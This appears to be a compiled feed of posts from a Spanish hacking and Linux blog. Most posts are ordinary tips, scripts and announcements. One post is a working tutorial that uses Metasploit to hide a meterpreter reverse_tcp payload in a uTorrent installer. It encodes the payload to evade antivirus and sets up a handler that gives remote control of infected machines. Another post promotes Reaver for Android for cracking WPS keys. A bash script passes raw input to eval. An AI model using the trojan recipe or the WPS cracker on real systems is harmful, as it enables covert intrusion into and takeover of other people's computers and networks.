Hacking Wireless desde el movil cuando vi, esta entrada en Underc0de me encanto :), primero porque ya tenemos a NMAP para Android Anmap, Anti DroidSqli y un montón de herramientas disponibles en la suite recopilada PengoDroid, a todas estas herramientas ahora se suma Reaver for Android.

Reaver para Android, nombre corto: RfA, es un atracador en GUI fácil de usar para los dispositivos Android con soporte bcmon.

Tiene algunos muy características interesantes:
  •     Detecta automáticamente los routers compatibles con WPS.
  •     Todos los Reaver-Settings son accesibles desde una GUI fácil de usar.
  •     Activa y desactiva el Modo Monitor-automáticamente cuando sea necesario.
  •     Proporciona una forma sencilla de conectar cuando Reaver encuentra el WPA-Key.

Estado del proyecto: BETA

¿Qué significa esto?

Bueno, RfA funciona, pero sólo se ha probado en muy pocos dispositivos. También hay algunas características que todavía no están implementadas. RfA Si recibe atención enought, Desarrollos seguirá muy pronto.

Instalación

 - Descargar RfA.apk AQUI - RfA v1.10: RFA - Reaver for Android
 - Ejecute bcmon, si se bloquea probar una segunda vez.
 - Si todo funciona bien, iniciar la RFA.
 - Después de seleccionar un Router con WPS, haga clic en "Monitor Test-Mode".
 - Ahora usted puede utilizar RfA.

Compatibilidad

Desarrollado y probado en: Nexus 7 2012
Blog Oficial: Bcmon
Google Code: bcmon Google Code

PD: Muy aparte de esta noticia de Reaver, recordarles que hoy es Jueves y toca entrada de @RizelTane :) para ver las entradas anteriores aqui

Regards,
Snifer
Leer Mas
Seguridad y HackingHeeee ando con una mañana bastante ajetreada, como tambien lo que me queda de la tarde y estuvo ameno escucharlo, aun mas con algo bastante rescatable, que es la siguiente frase: la NSA nos quiere nos cuida !! plop! me mataste con esto maldito!!.

Por si no saben quien es Angel estan invitados a leer la entrevista  Sniferl4bs entrevista al Jabali

Les dejo con la charla y ademas no se olviden de ir al Canal y ver el resto de las charlas #X1RedMasSegura ;).




Desconfiar desconfiar a desconfiar hasta del jabato!, una interesante charla :) muy amena un saludo grande Angel, al fin  en ponencia se le ve joven ahora si Enrique estara feliz ;).

No se olviden de visitar su blog, Seguridad Jabali. y a lo jabali nos despedimos ..

Seguridad a lo Snifer para Todos!

Regards,
Snifer
Leer Mas
Hace tiempo realizamos entradas realacionadas a GIT con GItHub en esta oportunidad vengo con mas tips relacionados a GIT para poder tenerlo a mano gracias a CodeinTheHole  la cual nos recomienda modificar un poco  nuestro .bash_aliases para hacer la vida mas facil con git en realidad no hacer la vida mas fácil mas bien es poder escribir menos para hacer nuestros commits ;).

alias git='hub'
alias g='git status -sb'
alias gh='git hist'
alias gp='git pull'
alias gpr='git pull --rebase'
alias gpp='git pull --rebase && git push'
alias gf='git fetch'
alias gb='git branch'
alias ga='git add'
alias gc='git commit'
alias gca='git commit --amend'
alias gcv='git commit --no-verify'
alias gd='git diff --color-words'
alias gdc='git diff --cached -w'
alias gdw='git diff --no-ext-diff --word-diff'
alias gdv='git diff'
alias gl='git log --oneline --decorate'
alias gt='git tag'
alias grc='git rebase --continue'
alias grs='git rebase --skip'
alias gsl='git stash list'
alias gss='git stash save'

Quizas algunos ya los tengan, recuerden que pueden agregar o crear sus propios alias, segun la necesidad lo amerite, en Debian como en Manjaro aun tengo algunos alias que siempre estan pendiendte como el de  actualizar el sistema, yaourt y demas ;).

El resto de las entradas de GIT y GitHub aqui!

Regards,
Snifer


Leer Mas
http://4.bp.blogspot.com/-yBOxDxixfRA/UQpq8IT-YUI/AAAAAAAAiCQ/JbLJoqrdQJw/s1600/gmailpythonsimple.jpg
Hace un rato un usuario de Underc0de pregunto como adjuntar un archivo obteniendo los datos del sistema previamente y que sea enviado por mediO de Python, asi que me puse a revisar un poco de la librería smtplib y con ella a jugar un poco, el código anda medio chanchito pero sirve para el cometido principal, tras lograr hacerlo funcional se me vino a la mente darle un uso diferente al script original, el cual sería un Python Mail Sender Love ;).

Ando romántico y porque no modificar un poquito y sacar provecho al script?

Lo primero que necesitamos es tener instalado cowsay y fortune a continuacion una pequeña muestra de cada uno, ya para instalarlos y demas todo es segun su distribución ;).

Un ejemplo de Cowsay  la variable -f (tux) nos permite mostar la forma del muñequito, si nos vamos a la terminal y realizamos el siguiente comando cowsay -l nos listara todos los bichitos, en vez de tux ponen el que les agrade.

[snifer@rizel]$ cowsay -l
Cow files in /usr/share/cows:
beavis.zen bong bud-frogs bunny cheese cower daemon default dragon
dragon-and-cow elephant elephant-in-snake eyes flaming-sheep ghostbusters
head-in hellokitty kiss kitty koala kosh luke-koala meow milk moofasa moose
mutilated ren satanic sheep skeleton small sodomized stegosaurus stimpy
supermilker surgery telebears three-eyes turkey turtle tux udder vader
vader-koala www


Ahora, tras lanzar hacemos la prueba con el texto a mostrar al final y tenemos lo siguiente:

$[snifer@rizel]$ cowsay -f tux "Romantico Snifer ;)"

 ______________________
< Romantico Snifer ;)  >
 ----------------------
   \
    \
        .--.
       |o_o |
       |:_/ |
      //   \ \
     (|     | )
    /'\_   _/`\
    \___)=(___/


Tras instalar fortune solo debemos de ir a la terminal e ingresar el comando fortune, que nos da una frase de manera aleatoria entre todas que tiene.


[snifer@rizel]$ fortune
"You should, without hesitation, pound your typewriter into a plowshare,
your paper into fertilizer, and enter agriculture"
  -- Business Professor, University of Georgia

Lo que nos permite hacer fortune es crear nuestras frases personalizadas, hace un tiempo jugue con fortune y el bashrc si mal no recuerdo pero creo que es mas de 2 años atras.

Se preguntan de donde saca las frases? el directorio es:

Arch y Derivados: /usr/share/fortune
Debian y Derivados: /usr/share/games/fortunes

Así que nos dirigimos al directorio y podemos lanzar un ls al directorio.

[snifer@rizel fortune]$ ls
off/             education      law.dat            news            rizel.dat
archlinux        education.dat  linux              news.dat        science
archlinux.dat    ethnic         linuxcookie        paradoxum       science.dat
art              ethnic.dat     linuxcookie.dat    paradoxum.dat   songs-poems
art.dat          food           linux.dat          people          songs-poems.dat
ascii-art        food.dat       literature         people.dat      sports
ascii-art.dat    fortunes       literature.dat     perl            sports.dat
computers        fortunes.dat   love               perl.dat        startrek
computers.dat    goedel         love.dat           pets            startrek.dat
cookie           goedel.dat     magic              pets.dat        translate-me
cookie.dat       humorists      magic.dat          platitudes      translate-me.dat
debian           humorists.dat  medicine           platitudes.dat  wisdom
debian.dat       kids           medicine.dat       politics        wisdom.dat
definitions      kids.dat       men-women          politics.dat    work
definitions.dat  knghtbrd       men-women.dat      riddles         work.dat
drugs            knghtbrd.dat   miscellaneous      riddles.dat     zippy
drugs.dat        law            miscellaneous.dat  rizel           zippy.dat

Podemos ver archivos con su dat respectivo entonces nosotros procedemos a crear uno nuevo, para ello tenemos que tener uno con la siguiente estructura.

Creando nuestras frases personalizadas para Fortune

Frase 1
       -- autor 
%
Frase 2

%
Visita SniferL4bs!

% 

Tras tener las frases en el archivo que deseemos en mi caso cree uno como rizel, así que hacemos uso de strfile.

strfile rizel rizel.dat


Tras ello ya tenemos lo necesario para usar en nuestro script.

Funcionamiento:
Envia un correo electrónico, a la señorita dueña de mi corazón con el archivo generado en temporal :), previamente creado con cowsay y fortune.

Necesitamos dos cuentas una nuestra  y otra de la novia, prometida chequeo, yo le envio a RizelTane ;). Y ahora el pequeño frankeinsteingther :3 muajajajjjaja.

#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
#maillove.py
#Realizado por Jose Moruno Cadima a.k.a Snifer
# www.sniferl4bs.com

import smtplib
import mimetypes
import os
import sys

from email.MIMEMultipart import MIMEMultipart
from email.Encoders import encode_base64
from email.mime.text import MIMEText
from email.MIMEBase import MIMEBase
from email import encoders 

gmail_to = 'xxxx@gmail.com' #Correo a enviar
gmail_from = 'xxxxxx@gmail.com' #Correo de donde se envia
password='*******' #Contraseña

os.system("rm /tmp/log")
#os.system("acpi -i | tee /tmp/log.txt")<
os.system("fortune rizel | cowsay -f kiss | tee /tmp/log")


msg = MIMEMultipart()
msg['From']= (gmail_from)
msg['To']= (gmail_to)
msg['Subject']="Subject"


file = open("/tmp/log.txt", "rb") #Direccion del Archivo
attach_file = MIMEBase('multipart', 'encrypted')
attach_file.set_payload(file.read())
file.close()

attach_file.add_header('Content-Disposition', 'attachment', filename='Una Frase al Día.txt')#NOMBRE DEL ARCHIVO A ENVIAR QUE SE VERA
msg.attach(attach_file)


mailServer = smtplib.SMTP('smtp.gmail.com',587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmail_from, password) 
mailServer.sendmail(gmail_from, gmail_to, msg.as_string())
mailServer.close()


El código por si solo se explica, ahora basta con meterlo en un cron y listo.. mensajes diarios!!!

Para ejecutarlo basta con ir a la terminal y python2 + script:

[snifer@rizel Desktop]$ python2 correoLove.py 
 _________________________________________ 
/ De ti estoy enamorado                   \
\ :) te quiero mucho             .        /
 ----------------------------------------- 
     \
      \
             ,;;;;;;;,
            ;;;;;;;;;;;,
           ;;;;;'_____;'
           ;;;(/))))|((\
           _;;((((((|))))
          / |_\\\\\\\\\\\\
     .--~(  \ ~))))))))))))
    /     \  `\-(((((((((((\\
    |    | `\   ) |\       /|)
     |    |  `. _/  \_____/ |
      |    , `\~            /
       |    \  \           /
      | `.   `\|          /
      |   ~-   `\        /
       \____~._/~ -_,   (\
        |-----|\   \    ';;
       |      | :;;;'     \
      |  /    |            |
      |       |            |



PD: Ya dije tiene falencias de código, no uso lo correcto por ahi deberia de haber un os.remove :$, pero ando flojo luego mejoro o alguien se anima mejor! ;), quizas es hasta codigo spaguetti como dice el gringo, pero esta funcional xD.

PD2: Debido a que en RadioHack me dijerón drogadicto :3 .. aqui esta el repositorio de GITHUB con las herramientas de SniferL4bs ;)
Regards,
Snifer
Leer Mas
Buenos días, hoy un amigo me pidió empezar a aprender programación y me preguntó si le podía pasar algún libro para empezar a aprender a programar, como todo buen amigo dispuesto a colaborar empecé a buscar un libro para aprender a programar desde 0 y me encontré que todos los libros son orientados a un lenguaje en particular (sea cual fuere) por lo que me propongo hacer una guía para aprender lo básico y extenso de cada lenguaje.
 
 Las computadoras son máquinas, las máquinas necesitan saber qué hacer y cuando hacerlo, por eso generalmente hay una persona que las manipula, las utiliza apretando botones para que dicha máquina haga algo en particular. Una computadora no se aleja de una máquina, en esencia requiere de una persona que la manipule para saber que hacer, ya sea en el momento o que le deje las instrucciones para realizar dicha tarea en otro momento.

Descargar
Leer Mas
Una interesante viñeta, referente a la comparación que se realiza con las contraseñas y la ropa interior, para iniciar esta mañana de sábado, con estas 5 frases que serán una oración para darlas a conocer cada vez que tenga la oportunidad.


  1. Las contraseñas son como la ropa interior...
           cámbialas a menudo.
  2. Las contraseñas son como la ropa interior...
           no las compartas con los amigos.
  3. Las contraseñas son como la ropa interior...
           cuanto más largas, mejor.
  4. Las contraseñas son como la ropa interior...
          sé misterioso.
  5. Las contraseñas son como la ropa interior...
         no las dejes al alcance de otros
Asi que ya saben señores las contraseñas son como la ropa interior....

Regards, 
Snifer
Leer Mas

Where does this come from? It's well known that a picture is worth a thousand words, and if it has letters then it should worth even more (I guess). I've noticed someone, with 203K followers, who publishes motivational phrases and he's doing it great... In fact, I follow him and to me it's cool, he motivated me with just one phrase; but I wouldn't have paid attention to that phrase if it'd been only text. No. It needed to have a nice color and be an image to capture my attention among so much information. Then I realized that I could do the same, but of course ... a programmer's way. How? Automating the process :B
The idea (By the way, thanks to James Blute for being the inspiration for this post): It is embodied in the following screenshot: 

The idea is to tweet the text and have the same text but as an image, easy.
What do we need?:
  • Something that allows us to generate an image from text: ImageMagick! Period.(It doesn't have rivals, from my point of view)
  • Something that allows us to tweet and attach a picture: Here we have more than an option, but as I'm in the Ruby vibe, I will use Twitter cli.
  • Something that links both: bash. I love powershell, but anyway. (Hope the owner of this blog doesn't find it out).

As far as I know , the package ImageMagick comes installed by default in Linux distributions; I can't remember having to install it. But if I needed to, I think that the next would solve it: 

$ sudo apt-get install imagemagick

Next in our list is twitter cli. The installation process is tedious and worthy of a full post. That's why I'm leaving the installation link here: [Installation] and the next benefits if you are still wondering whether to install it or not:
  • How funny it is to tweet from the command line: "We are geeks, yeaah baby".
  • Twwet automatically using cron or at :D. This really is great ... At least one follower will wonder if you ever sleep xD
  • And... that.
And now, the important part: the little script in bash.

#!/bin/bash
echo "This will be posted: $1"
file='temporary.txt'
eval `touch $file`
eval `echo $1>>$file`

picture=`date +'%F-%T'`
image_magick="convert 
-background turquoise 
-fill white 
-pointsize 18 
-size 400x400 
-gravity center 
label:@$file 
$picture.gif"
eval $image_magick

eval `rm $file`
tweet="t update \"$1\" --file=$picture.gif"
eval $tweet
#eval `rm $picture.gif`
echo "Done boss."

We copy the above in a file called: post-automatically
We assign execute permissions:

$ chmod +x post-automatically

And run the script passing an argument as a parameter: the text you wish to post, in double or single quotes script. In this case doubles:

$ ./post-automatically "Hi"

And we have the next result:






And so the visualization in Twitter :D


What does the script do?

It creates a file called: temporary.txt in which we have inserted the text passed as argument. Then it gets the current date and time to create the name of our image.
It then executes the convert command (from the ImageMagick package) with the next options and in this order:
Background color: turquoise
Font color: white
Font size: 18 points
Canvas size: 400x400 pixels
Text alignment: center
Text: The content of our file
Image to be created: the name we have previously generated, with gif extension,
It then removes the file where our text was, because we don't need it anymore.
Then we tweet the text received as an argument and attach the image that has been generated.

The script came out from a spark of madness ... so there are cases where it does not work. I challenge you to find such cases and improve it. I was trying to improve it, I'm still in that, but I'll do it when I feel that spark of madness again (besides I don't have that much time, I'm in a startup project), meanwhile below is the script at the development phase. PD. I do not program in bash (This must be my fourth attempt) so my code (which is seen below) can be insulting to some experts.

Regards. 

#!/bin/bash
echo "This is the text that will be posted: $1"
#$( echo VAR=value )
file='temporary.txt'
eval echo `touch $file`
eval echo `echo $1>>$file`
#now="$(date +'%d/%m/%Y')"
#whoami
csv=`t whoami -c`

#grep -o . <<< $csv | while read letter;  do echo "my letter is $letter" ; done
#echo $csv

for (( i=0, c=0; i<${#csv}; i++ )); do
  if [[ ${csv:$i:1} == "," ]]
  then
 let c++
 if [ $c == 23 ] 
 then
   #while 
   #echo ${csv:$i:1}
   #echo ${csv:$i:2}
   #echo ${csv:$i:3}
   #echo ${csv:$i:4}
   #echo ${csv:$i:5}
   #echo ${csv:$i:6}
   #echo ${csv:$i:7}
   #echo ${csv:$i:9}
   #echo ${csv:$i:10}
   #echo ${csv:$i:11}
   for (( j=1;  ${csv:$i:$j} != ","  ; j++ )); do
    echo ${csv:$i:$j}
   done
 fi
  fi
done



picture=`date +'%F%T'`
image_magick="convert 
-background turquoise 
-fill white 
-pointsize 18 
-size 500x500 
-gravity center 
label:@$file 
$picture.gif"
eval $image_magick



echo "Done boss."
Leer Mas

A que viene esto? Una imagen vale más que mil palabras, y si tiene letras entonces valdrá aún más (supongo). He notado que una persona en particular, con 203K followers, publica frases motivadoras y le vá bien.... De hecho yo lo sigo y me parece genial, llegó a motivarme con una sola frase; pero yo no hubiera prestado atención a esa frase si tan sólo hubiese sido texto. No. Necesitaba también tener un lindo color atrayente y ser una imagen para que pudiera captar mi atención entre tanta información. Y en eso me puse a pensar que yo también podría hacer lo mismo, pero claro... al estilo de un informático. Como? Pues automatizando un poco el proceso :B
La idea: Está plasmada en el siguiente screenshot: 

Twittear el texto y tener el mismo texto pero en una imagen, sencillo.
Que necesitamos?:
  • Algo que nos permita generar la imagen a partir del texto: ImageMagick! Y punto. (No tiene rival, desde mi punto de vista)
  • Algo que nos permita twittear y adjuntar una imagen: Aquí hay más de una opción, pero como ando en la onda Ruby usaré Twitter cli.
  • Algo que enlace ambos: bash. Me gusta más powershell, pero ni modo. (Que no se entere el dueño de este blog).

Según tengo entendido, el paquete ImageMagick viene instalado por defecto en las distribuciones de Linux; al menos yo no recuerdo haberlo tenido que instalar. Pero de tener que hacerlo creo que bastaría lo siguiente: 

$ sudo apt-get install imagemagick

Lo siguiente en nuestra lista es twitter cli. El proceso de instalación es algo tedioso y meritorio de un post completo. Es por eso que les dejo el siguiente enlace para que lo instalen: Instalación y los siguientes beneficios inmediatos por si andan dudando si deberían hacerlo o no:
  • Lo divertido que es postear desde la línea de comandos: "Somos frikis, yeaah baby".
  • Postear de forma automática usando el comando at o cron :D. Esto si es genial... Al menos un follower se preguntará si en algún momento duermes xD
  • Y... eso.
Y ahora la parte importante: el pequeño script en bash.

#!/bin/bash
echo "This will be posted: $1"
file='temporary.txt'
eval `touch $file`
eval `echo $1>>$file`

picture=`date +'%F-%T'`
image_magick="convert 
-background turquoise 
-fill white 
-pointsize 18 
-size 400x400 
-gravity center 
label:@$file 
$picture.gif"
eval $image_magick

eval `rm $file`
tweet="t update \"$1\" --file=$picture.gif"
eval $tweet
#eval `rm $picture.gif`
echo "Done boss."

Copiamos lo anterior en un archivo llamado: post-automatically
Le asignamos permisos de ejecución:

$ chmod +x post-automatically

Y ejecutamos el script pasándole un argumento como parámetro, el texto que deseamos postear, entre comillas dobles o simples. En este caso dobles:

$ ./post-automatically "Hi"

El resultado es el siguiente:






Y la visualización en Twitter :D


Que hace el script?

Crea un archivo llamado: temporary.txt en donde inserta el texto que hemos pasado como argumento. Obtiene la fecha y hora actual para crear el nombre de nuestra imagen.
Luego ejecuta el comando convert(del paquete ImageMagick) con las siguientes opciones y en este orden:
Color de fondo: turquesa
Color de fuente: blanco
Tamaño de fuente: 18 puntos
Tamaño del canvas: 400x400 pixels
Ubicación del texto: centro
Texto: el contenido de nuestro archivo
imagen a ser creada: el nombre previamente generado, con extensión gif,
Luego eliminamos el archivo en donde se encuentra nuestro texto porque ya no lo necesitamos.
Twitteamos con el argumento recibido y adjuntamos la imagen que ha sido generada.

El script salió de una chispa de locura instantánea por lo que... hay casos en los que no funciona. Los reto a encontrar esos casos y a mejorarlo. Estuve intentando mejorarlo, todavía lo pienso hacer cuando venga otra de esas chispas de locura, mientras aquí posteo el estado dev del script previo. PD. No programo en bash (Este debe ser mi cuarto intento) por lo que mi código(lo que están por ver a continuación) puede llegar a ofender a algunos expertos.

Saludos. 

#!/bin/bash
echo "This is the text that will be posted: $1"
#$( echo VAR=value )
file='temporary.txt'
eval echo `touch $file`
eval echo `echo $1>>$file`
#now="$(date +'%d/%m/%Y')"
#whoami
csv=`t whoami -c`

#grep -o . <<< $csv | while read letter;  do echo "my letter is $letter" ; done
#echo $csv

for (( i=0, c=0; i<${#csv}; i++ )); do
  if [[ ${csv:$i:1} == "," ]]
  then
 let c++
 if [ $c == 23 ] 
 then
   #while 
   #echo ${csv:$i:1}
   #echo ${csv:$i:2}
   #echo ${csv:$i:3}
   #echo ${csv:$i:4}
   #echo ${csv:$i:5}
   #echo ${csv:$i:6}
   #echo ${csv:$i:7}
   #echo ${csv:$i:9}
   #echo ${csv:$i:10}
   #echo ${csv:$i:11}
   for (( j=1;  ${csv:$i:$j} != ","  ; j++ )); do
    echo ${csv:$i:$j}
   done
 fi
  fi
done



picture=`date +'%F%T'`
image_magick="convert 
-background turquoise 
-fill white 
-pointsize 18 
-size 500x500 
-gravity center 
label:@$file 
$picture.gif"
eval $image_magick



echo "Done boss."
Leer Mas
Hola a todos! Buenas buenas, ya es casi viernes a minutos y venimos con noticia  de ultimo momento :D, tenemos nueva escritoria en SniferL4bs aun mas con privilegios de sudo wudo ;).

https://pbs.twimg.com/profile_images/378800000086538356/7260b3dc7557e476ca99187f8fe433ee_400x400.jpeg@RizelTane a partir de hoy escribira todos los jueves en SniferL4bs, traendo entradas referentes al mundo de GNU/LINUX, Diseño, Programación, quizas algo de lo que piense o quien sabe,como todos los escritores del blog.

Una breve y rapida presentación la podemos ver en su Twitter, dentro de pocos minutos, realizaŕa su primera entrada.



Rizel Tane a.k.a Liz

and still a . Life and simplicity lover. Engaged to but not to a programming language, although is an option.

Solo me queda decir, bienvenida y todo un honor tener en este pequeño pedazo del ciberespacio a la persona mas importante en mi vida *_*.

Regards,
Snifer


Leer Mas

Por segunda vez en el año si no ando mal, estamos cambiando el estilo la razón de este cambio tiene nombre y apellido y se llama Jose Moruno xD, me dio por cambiar y ser mas simplistas  siempre manteniendo, el color rojo y negro en lo posible ya que es esto lo que identifica al sitio. 

Pueden ver en la imagen superior como ahora en este momento el cambio, en el transcurso de los proximos dias a lo mucho hoy en la noche, terminare de hacer algunos cambios referentes a diseño pero ya tenemos algo nuevo.

Referente a bug's  y demas detalles haganmelo saber en este post o en Twitter!

Regards,
Snifer




Leer Mas
Hola que tal otra entrada, esta vez viene una realizada por g1iore3y87 el cual muestra una de las mil maneras de vulnerar los antivirus, como saben tenemos aqui en el blog mas entradas haciendo uso de Python donde Sanko lo demostro.

Al utilizar metasploit es posible fusionar una sesión de meterpreter a un exe sin ser detectado por los antivirus, ademas esto permite vulnerar equipos y obtener una sesion remota de meterpreter con la cual se puede obtener el completo control de la maquina vulnerada.

1.- Primero vamos a iniciar el servicio de metasploit (si no lo tienes iniciado) para ello vamos a: Aplicaciones ->  Kali Linux -> System Services -> Metasploit -> community / pro start.




2.- Iniciado el servicio y usando la misma terminal, tecleamos el siguiente comando: msfconsole. El cual nos dara la siguiente terminal.


3.- Ahora seleccionamos el exe que usaremos como plantilla, en mi caso usare Utorrent para windows.


4.- Ahora asignaremos el payload a usar y los parametros quedando algo asi:

use payload/windows/meterpreter/reverse_tcp -> payload a usar
Código: [Seleccionar]
set LHOST 192.168.15.118 ->aqui tu ip
set LPORT 4445 ->aqui el puerto que prefieras
5.- Ahora con el comando generate iniciaremos con la fusion de nuestro meterpreter.
Código: [Seleccionar]
 generate -e x86/shikata_ga_nai -i 132 -x /root/Burlar/uTorrent.exe -k -t exe -f /root/Burlar/uTorrent1.exe

Quedando todo como en la imagen (no olvides reemplazar la direccion del exe por  la que uses):


6.- Ahora toca levantar el handler para que este quede a la espera de la coneccion de nuestro archivo infectado.
Código: [Seleccionar]
use multi/handler
set payload windows/meterpreter/reverse_tcp ->payload utilizado
set lhost 192.168.15.118 -> nuestra ip
set lport 4445 ->puerto que elejimos
exploit  ->iniciar el handler

Quedando como en la siguiente imagen:


7.- Ahora revisaremos que tan efectivo fue nuestro trabajo
Resultado  Virus total


8.- Ahora para probar que si funciona nuestro archivo infectado dejo un video haciendo
la prueba de su uso.


Pues como puedes ver es muy facil asi que si te gusto no olvides comentar.
 Saludos y que tengas un buen dia  atte: g1iore3y87
Leer Mas
http://1.elscdn.net/cover_img/720256.gifOtro libro que viene a ser compartido en el blog, que es A Guide to Kernel Explotation para los que andan en reversing y las ramas afines le vendra al pelo, lastima que aun no tenga lo necesario :|, para poder leer y aprender pero espero en una proxima vuelta si hacerlo.


Descarga

Y si señores es una entrada corta, rapida y veloz U_u no hay buenos humores el dia de hoy. xD

Regards,
Snifer
Leer Mas
Hola que tal hoy es Lunes e iniciamos la semana, con las pilas puestas en esta oportunidad quiero presentarle un video de su servidor, el cual es sobre la participación que tuve en el evento de Tendencias de Internet allá por el 2012, el cual acote a la presentación de Iván Gutierrez, en la cual doy mi punto de vista referente a lo que es el Hacking y la tergiversación del termino que se tiene y se tuvo con anterioridad por la aparición de Anonymous  y el revuelo que hubo en Bolivia, aunque aun siguen con lo mismo, pero el comentario me lo reservo para otra entrada, quizas salga o no.


Para que puedan ver la charla principal de Ivan,en el siguiente link: La ética Hacker: Hackers, Vs Crackers

Regards,
Snifer
Leer Mas


Mastering Metasploit
Hola a todos es dormingo, y les traigo este librito Mastering Metasploit recien salidito del horno, por decirlo asi el cual es Mastering Metasploit,un excelente libro el cual nos brinda el conocimiento del Framework de explotación pudiendo ser unos maestros pokemon, ya me perdi lo se.


Write and implement sophisticated attack vectors in Metasploit using a completely hands-on approach.

Descarga


Regards,
Snifer
Leer Mas
Buenas la semana pasada andaba hablando en mil idiomas porque mi pc no funcionaba de manera correcta, ya saben como me pongo los que me conocen el primer problema que tuve fue el no conectarme por wifi desde hace 2 dias atras, por lo cual estaba a punto de dar un grito al cielo, me acorde del uso de rfkill desde mis tiempos con Ubuntu pero para mi sorpresa no funcionaba ni atras ni adelante siempre dandome el siguiente resultado.


Lo raro, fue que en Ubuntu y Debian me furulaba debidamente el uso de rfkill mas  de una vez lo hice, y funcionó porque no daba npi, sera porque Manjaro no es para mi?

Comenze a buzear en google y cada resultado loco que veia, desde uno simple quitar la bateria, esperar un momento y walla funcionara esta solución fue dada para las laptops Dell, como la mia lo es, lo hize no negare lo hize! y nada, otros decian problemas de la BIOS entra y configura que solo funcione con f2 sin usar fn+f2 ok, les hice caso y al final nada de nada!, ya estaba a minutos, digo segundos de llegar a casa  y hacer un hard reset xD me entienden a que me refiero.

Entonces ya por tomar la medida mas loca, decidi hacer lo mas tonto o bobo por decirlo asi probar con wlan0 y demas en una de esas pueden ver en la siguiente captura:



Por arte de magia funciono!, entonces aqui viene mi pregunta retórica al hacer el unblock 0, porque no funcionaba pero si al realizar rfkill unblock wlan.

Así que al realizar ello pude solucionar de manera satisfactoria mi problema, esto no anda de más por si me vuelve a ocurrir o a alguien le pasa.

Regards,
Snifer


Leer Mas

Ya salio la fecha del Hackmeeting este año lo organizan los chicos de Potosí, el año pasado aún recuerdo la batalla que se tuvo por quien lo organizaria este año, fue entre los chicos del HackLab del Alto y los chicos de Potosí.

Hablando del año pasado, ahora que recuerdo debo las fotos :/, en estos días las subiré si no lo hize, pero mientras nos vamos a lo que vinimos otro año en el cual todos los  locos por la Inseguridad de mi Pais nos reuniremos, para poder compartir las experiencias, vulnerabilidades experimentos, proyectos o simplemente poder confraternizar con los demas, este año nos vinieron con una gran sorpresa dominio!!! si el dominio es el siguiente http://www.hackmeeting.org.bo/ me encanta diría yo se lucieron los chicos, asi ya hablando este año vienen con mas sorpresas, una de ellas es la realizacion de un ... lo dejo ahí que luego me matan, seguro en los proximos dias se realizara el Call for papers el cual desde hace 2 años se inicio, como tambien las descoferencias que se realizán.

Ahora como lo ven el 20 y 21 de Septiembre se realizará y por motivos de fuerza mayor SniferL4bs no estará presente,  ustedes saben una razón principal lo que se viene a fin de año y mas que todo el 21 es mi cumpleaños y toca pasarlo en familia tras el año pasado haber estado lejos de ellos, no puedo dar un paso a torcer, desde aquí andare hechandole ganas, y ver como ayudarles, aunque ando pensando montar el reto nuevamente, 2 años que lo realize y en ambos no pudierón completarlos.

Así que Hackmeeting 2015 ! espero ir!! :) no olviden seguir el HashTag #HackMeBo en Twitter.

Regards,
Snifer




Leer Mas
Ahora ando realizando la edición del Libro de HackStory la version free con permiso de Merce esta mas claro, y como ando relizando el CAP 1 y el CAP 2 para que luego el gringo termine de colaborarme con el resto, cabe resaltar que lo andamos realizando en LaTeX :D si ese sepsi y bello LaTeX el cual estara disponible para todos, en un repositorio en GitHub tras ello iremos mejorando con la ayuda de todos, bugs que se presenten luego iremos viendo como apoyar por ahora la gran salida se vera en Craftbook's por problemas mayores y mi error no actualize aun el estado de domando a tu foca :$ lo siento, ese se viene para luego ;).

Un breve adelanto, para que lo vean *_*

Ahora si viene la razón del titulo de la entrada:



Fri 25 May 2012 01:06:51 PM CEST
 
¿Que por qué me enamoré de los hackers?

Porque son gente lista y genial, de inacabable curiosidad, sentido del humor y vorazmente críticos, capaces de ponerlo todo patas arriba porque se les ocurrió una idea y con una ética colectiva que está cambiando el mundo.

¡Ah, no! ¿Que no es así como pensabas que eran los hackers? ¿Imaginabas unos tipos malvados, delincuentes habituales, sin empacho en asaltar tu ordenador y tu cuenta bancaria? ¿Esos de los que hablan día sí día también los medios y la policía, poniéndoles la etiqueta de "hacker"? 

Bueno, sí, son hackers, si te ciñes a la definición estricta: "Persona que disfruta explorando los detalles de cómo funcionan sistemas, ordenadores y redes, opuesto a la mayoría de usuarios, que prefieren aprender lo mínimo necesario". Sí, todos son expertos en tecnología, pero a los hackers dedicados al Mal la comunidad prefiere llamarlos "hackers de sombrero negro", "hackers malos"... ángeles caídos. 

Los hackers que yo amo no matarían una mosca. No te digo que no se hayan divertido alguna vez asaltando un sistema, pero no roban ni destruyen. Curiosean. Avisan de que hay tal problema. Un hacker, dice un amigo, es alguien capaz de encontrar una solución elegante a un problema importante. Eso valoran los hackers. No el dinero que puedan robar. Su tesoro es el conocimiento. Están más allá.

Ellos crearon la red. Crearon los primeros ordenadores, los primeros programas que dieron vida a los ordenadores, las redes y protocolos que los pusieron en contacto. Internet es hija de la comunidad hacker y la forma como está montada, como funciona, transmite su forma de ser. Por eso quien entra, cambia. Mucho o poco, pero cambian sus conexiones neuronales y sociales, se activan ideas y un sentido de la moral que quizás ya tenía, pero estaba durmiendo, sin espacio donde expresarse. 

Es por eso que el sistema, ese gigante con pies de barro, ahora hasta el cuello, criminaliza a la comunidad hacker. Sabe que su forma de pensar es su perdición porque es parte del nuevo mundo que vemos eclosionar a nuestro alrededor. Los Indignados no existirían sin Internet. Todos los cambios sociales que estamos viviendo pasan por la red. Ellos, los hackers, la construyeron. Y la gente no hace más que ser digna de este legado. 

La comunidad hacker tiene una ética comúnmente aceptada que dice cosas como las siguientes: "El acceso a los ordenadores y a todo lo que te pueda enseñar alguna cosa sobre cómo funciona el mundo debe ser ilimitado y total". "Toda la información debería ser libre". "No creas a la autoridad, promueve la descentralización". ¿Qué, te gustan? ¡A ver si tú también te habrás enamorad@ de los hackers! 

Mercè Molist Ferrer. Fundadora de Hackstory.net

Texto publicado en el diario "El Mundo", en el contexto de la promoción de la campaña de crowdfunding que se llevó a cabo en junio y julio de 2012. El objetivo era conseguir dinero para pagar el tiempo de escribir este libro que tienes ante tus ojos.
La campaña se realizó en la plataforma Goteo y superó todas las expectativas, llegando a recaudar 6.000 euros, donados por 131 personas, la gran mayoría pertenecientes a la comunidad hacker hispana.

Fuente: Hackstory.net 

Regards,
Snifer 
Leer Mas

Tenia que llegar el manual libro como quieran decirlo para hacker un carro, por ahora SniferL4bs no tiene su propio tronco móvil, pero si alguien tiene y se anima a meterle mano y aun mas que sea de Bolivia Cochabamba porfavor avise asi trabajamos con el :3.

Tabla de Contenidos
  • Intro
  • Understanding Attack Surfaces
  • Infotainment Systems
